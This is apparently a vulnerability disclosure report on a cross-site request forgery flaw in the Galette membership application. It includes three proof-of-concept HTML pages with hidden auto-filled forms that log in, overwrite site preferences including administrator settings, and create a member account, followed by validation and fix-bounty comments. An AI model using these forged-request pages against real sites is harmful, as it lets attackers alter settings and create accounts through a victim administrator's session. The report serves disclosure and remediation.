Cross-Site Request Forgery (CSRF) in galette/galette

Valid

Reported on

Sep 25th 2021


Description

Attacker is able to execute an CSRF attack when a user visits a malicious page

Proof of Concept

// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8081/webroot/index.php/login" method="POST">
      <input type="hidden" name="login" value="test" />
      <input type="hidden" name="password" value="test" />
      <input type="hidden" name="ident" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability is capable of allowing an attacker to submit CSRF through a crafted malicious page

Occurences

Allows attacker to change site preferences if an administrator visits malicious page

//POC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8081/webroot/index.php/preferences" method="POST">
      <input type="hidden" name="pref&#95;nom" value="TEST CSRF" />
      <input type="hidden" name="pref&#95;slogan" value="" />
      <input type="hidden" name="pref&#95;footer" value="" />
      <input type="hidden" name="logo" value="" />
      <input type="hidden" name="pref&#95;adresse" value="&#45;" />
      <input type="hidden" name="pref&#95;adresse2" value="" />
      <input type="hidden" name="pref&#95;cp" value="" />
      <input type="hidden" name="pref&#95;ville" value="" />
      <input type="hidden" name="pref&#95;pays" value="" />
      <input type="hidden" name="pref&#95;postal&#95;adress" value="0" />
      <input type="hidden" name="pref&#95;postal&#95;staff&#95;member" value="&#45;1" />
      <input type="hidden" name="pref&#95;website" value="" />
      <input type="hidden" name="pref&#95;googleplus" value="" />
      <input type="hidden" name="pref&#95;facebook" value="" />
      <input type="hidden" name="pref&#95;twitter" value="" />
      <input type="hidden" name="pref&#95;linkedin" value="" />
      <input type="hidden" name="pref&#95;viadeo" value="" />
      <input type="hidden" name="pref&#95;lang" value="en&#95;US" />
      <input type="hidden" name="pref&#95;numrows" value="10" />
      <input type="hidden" name="pref&#95;redirect&#95;on&#95;create" value="0" />
      <input type="hidden" name="pref&#95;log" value="1" />
      <input type="hidden" name="pref&#95;statut" value="9" />
      <input type="hidden" name="pref&#95;filter&#95;account" value="0" />
      <input type="hidden" name="pref&#95;membership&#95;ext" value="12" />
      <input type="hidden" name="pref&#95;beg&#95;membership" value="" />
      <input type="hidden" name="pref&#95;membership&#95;offermonths" value="0" />
      <input type="hidden" name="pref&#95;bool&#95;publicpages" value="1" />
      <input type="hidden" name="pref&#95;publicpages&#95;visibility" value="1" />
      <input type="hidden" name="pref&#95;bool&#95;selfsubscribe" value="1" />
      <input type="hidden" name="pref&#95;new&#95;contrib&#95;script" value="" />
      <input type="hidden" name="pref&#95;rss&#95;url" value="http&#58;&#47;&#47;galette&#46;eu&#47;dc&#47;index&#46;php&#47;feed&#47;atom" />
      <input type="hidden" name="pref&#95;galette&#95;url" value="" />
      <input type="hidden" name="pref&#95;email&#95;nom" value="Galette" />
      <input type="hidden" name="pref&#95;email" value="mail&#64;domain&#46;com" />
      <input type="hidden" name="pref&#95;email&#95;reply&#95;to" value="" />
      <input type="hidden" name="pref&#95;email&#95;newadh" value="mail&#64;domain&#46;com" />
      <input type="hidden" name="pref&#95;bool&#95;wrap&#95;mails" value="1" />
      <input type="hidden" name="pref&#95;mail&#95;method" value="0" />
      <input type="hidden" name="pref&#95;mail&#95;smtp&#95;host" value="" />
      <input type="hidden" name="pref&#95;mail&#95;smtp&#95;port" value="" />
      <input type="hidden" name="pref&#95;mail&#95;smtp&#95;user" value="" />
      <input type="hidden" name="pref&#95;mail&#95;smtp&#95;password" value="" />
      <input type="hidden" name="pref&#95;mail&#95;sign" value="&#123;NAME&#125;&#13;&#10;&#13;&#10;&#123;WEBSITE&#125;&#13;&#10;&#123;GOOGLEPLUS&#125;&#13;&#10;&#123;FACEBOOK&#125;&#13;&#10;&#123;TWITTER&#125;&#13;&#10;&#123;LINKEDIN&#125;&#13;&#10;&#123;VIADEO&#125;" />
      <input type="hidden" name="pref&#95;etiq&#95;marges&#95;v" value="10" />
      <input type="hidden" name="pref&#95;etiq&#95;marges&#95;h" value="10" />
      <input type="hidden" name="pref&#95;etiq&#95;hspace" value="10" />
      <input type="hidden" name="pref&#95;etiq&#95;vspace" value="5" />
      <input type="hidden" name="pref&#95;etiq&#95;hsize" value="90" />
      <input type="hidden" name="pref&#95;etiq&#95;vsize" value="35" />
      <input type="hidden" name="pref&#95;etiq&#95;cols" value="2" />
      <input type="hidden" name="pref&#95;etiq&#95;rows" value="7" />
      <input type="hidden" name="pref&#95;etiq&#95;corps" value="12" />
      <input type="hidden" name="pref&#95;card&#95;abrev" value="GALETTE" />
      <input type="hidden" name="pref&#95;card&#95;strip" value="Gestion&#32;d&apos;Adherents&#32;en&#32;Ligne&#32;Extrêmement&#32;TarabiscotÃ&#169;e" />
      <input type="hidden" name="pref&#95;card&#95;tcol" value="&#35;ffffff" />
      <input type="hidden" name="pref&#95;card&#95;scol" value="&#35;8c2453" />
      <input type="hidden" name="pref&#95;card&#95;bcol" value="&#35;53248c" />
      <input type="hidden" name="pref&#95;card&#95;hcol" value="&#35;248c53" />
      <input type="hidden" name="card&#95;logo" value="" />
      <input type="hidden" name="pref&#95;card&#95;self" value="1" />
      <input type="hidden" name="pref&#95;card&#95;address" value="1" />
      <input type="hidden" name="pref&#95;card&#95;year" value="2021" />
      <input type="hidden" name="pref&#95;card&#95;marges&#95;v" value="15" />
      <input type="hidden" name="pref&#95;card&#95;marges&#95;h" value="20" />
      <input type="hidden" name="pref&#95;card&#95;vspace" value="5" />
      <input type="hidden" name="pref&#95;card&#95;hspace" value="10" />
      <input type="hidden" name="pref&#95;password&#95;length" value="6" />
      <input type="hidden" name="pref&#95;password&#95;strength" value="0" />
      <input type="hidden" name="pref&#95;admin&#95;login" value="admin" />
      <input type="hidden" name="pref&#95;admin&#95;pass" value="" />
      <input type="hidden" name="pref&#95;admin&#95;pass&#95;check" value="" />
      <input type="hidden" name="valid" value="1" />
      <input type="hidden" name="pref&#95;theme" value="default" />
      <input type="hidden" name="pref&#95;telemetry&#95;date" value="" />
      <input type="hidden" name="pref&#95;instance&#95;uuid" value="" />
      <input type="hidden" name="pref&#95;registration&#95;date" value="" />
      <input type="hidden" name="pref&#95;registration&#95;uuid" value="93" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
//POC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8081/webroot/index.php/member/store" method="POST">
      <input type="hidden" name="photo" value="" />
      <input type="hidden" name="titre&#95;adh" value="" />
      <input type="hidden" name="sexe&#95;adh" value="0" />
      <input type="hidden" name="nom&#95;adh" value="test" />
      <input type="hidden" name="prenom&#95;adh" value="" />
      <input type="hidden" name="societe&#95;adh" value="" />
      <input type="hidden" name="pseudo&#95;adh" value="" />
      <input type="hidden" name="ddn&#95;adh" value="" />
      <input type="hidden" name="lieu&#95;naissance" value="" />
      <input type="hidden" name="prof&#95;adh" value="" />
      <input type="hidden" name="pref&#95;lang" value="en&#95;US" />
      <input type="hidden" name="adresse&#95;adh" value="123213123" />
      <input type="hidden" name="adresse2&#95;adh" value="" />
      <input type="hidden" name="cp&#95;adh" value="312312" />
      <input type="hidden" name="ville&#95;adh" value="gfgdfgf" />
      <input type="hidden" name="pays&#95;adh" value="" />
      <input type="hidden" name="tel&#95;adh" value="" />
      <input type="hidden" name="gsm&#95;adh" value="" />
      <input type="hidden" name="email&#95;adh" value="" />
      <input type="hidden" name="url&#95;adh" value="" />
      <input type="hidden" name="jabber&#95;adh" value="" />
      <input type="hidden" name="gpgid" value="" />
      <input type="hidden" name="activite&#95;adh" value="1" />
      <input type="hidden" name="id&#95;statut" value="9" />
      <input type="hidden" name="login&#95;adh" value="test1" />
      <input type="hidden" name="mdp&#95;adh" value="test1234" />
      <input type="hidden" name="mdp&#95;adh2" value="test1234" />
      <input type="hidden" name="date&#95;crea&#95;adh" value="2021&#45;09&#45;25" />
      <input type="hidden" name="info&#95;adh" value="" />
      <input type="hidden" name="info&#95;public&#95;adh" value="" />
      <input type="hidden" name="redirect&#95;on&#95;create" value="0" />
      <input type="hidden" name="valid" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
N modified their report
4 months ago
Ziding Zhang
4 months ago

Admin


Hey N, I've opened a PR asking for a security policy.

N
4 months ago

Researcher


@Admin Any update from the maintainer?

Adam Nygate validated this vulnerability 3 months ago
N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Johan Cwiklinski confirmed that a fix has been merged on a5602b 2 months ago
Johan Cwiklinski has been awarded the fix bounty
member.tpl#L1-L364 has been validated
preferences.tpl#L1-L687 has been validated